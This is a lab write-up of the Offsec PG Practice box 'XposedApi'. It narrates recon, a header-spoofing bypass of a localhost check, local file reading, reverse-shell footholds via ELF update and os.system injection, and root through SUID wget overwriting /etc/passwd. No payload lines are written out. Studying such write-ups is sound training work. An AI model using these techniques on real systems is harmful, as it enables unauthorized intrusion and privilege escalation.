XposedApi
Offsec PG Practice
INIT FOOTHOLD:
I started my recon with nmap automator and found few of the ports open .
As you can see nmap initial port scan says only port 22 to be open that too also openssh 7.9p1 which dont have any public exploit to give an rce.
After sometime nmap completed its full scan and found 13337 port to be open
So we headed over to port 13337 which was a Remote Management Server meant to be used for administrative purpose and should not be expose to the internet.But it is.
There are couple of endpoints such as
/version==>It gives the version of the app that is hosted.
/log==>It gives the logs of the app but it allows connection only from localhost.
/update==>it takes a username and a url in json format where the url must point to a elf which will be used to update the app.
/restart==>To restart the app
So we first moved to logs to see how is it checking the whether its comming from localhost or not.
One way to do so is to check the X-Forwarded-For header or may be X-Remote-Ip and all.But these implementations are often buggy and relying on a http header that can be controlled by the user is not a good idea.
So I tried to bypass it by putting a X-Fowarded-For header and we did bypass the check and it gave us some info like .
So I used the info it read local files and as you can see we are able to read the /etc/passwd file.
We then explored the /update endpoint and as i said before it takes a username an url to get the elf file which is then used to update the app.
Exploitation
There are different ways we can exploit this app to get the foothold.
- RCE through the /restart and /update endpoint.
As we can see that the /update endpoint takes an elf from the user and then /restart endpoint is used to restart the app with that elf I prepared an reverse_shell elf with msfvenom.
Then I hosted it, used the /update endpoint to make the app get my elf and then execute it and BOOM i got the shell back.
2. Leaking the source code and identifying the RCE.
As we have a LFI we are already in the web root,so trying some common file names like main.py , app.py, api.py may give us the source code.
If you see the code on the /update endpoint you will see that the input is being sent to the os.system() with out any sanitization.
Which leads to code execution.
So I hosted my reverse shell script on my machine and prepared the payload to place in the update endpoint and executed it with this command exeution bug only to get the shell.
PRIVESC
Once I got in before trying any enumeration script i quickly tried to see the setuid binaries.
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/wget
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
As you can see we have wget having suid privilege.So we can download a file and can place it anywhere we want which leads to arbitary file write.
Here we can either write the /etc/shadow file or may be /etc/passwd or /etc/sudoers file to get the root privilege.
I decided to overwrite the /etc/passwd file .
I used openssl to create hash for me and added it to file named as passwd file,and then i used wget to place in in /etc/passwd.
And then i used su — wh0am1 and passed my password and got root.
Thanks For Reading.
Happy Hacking
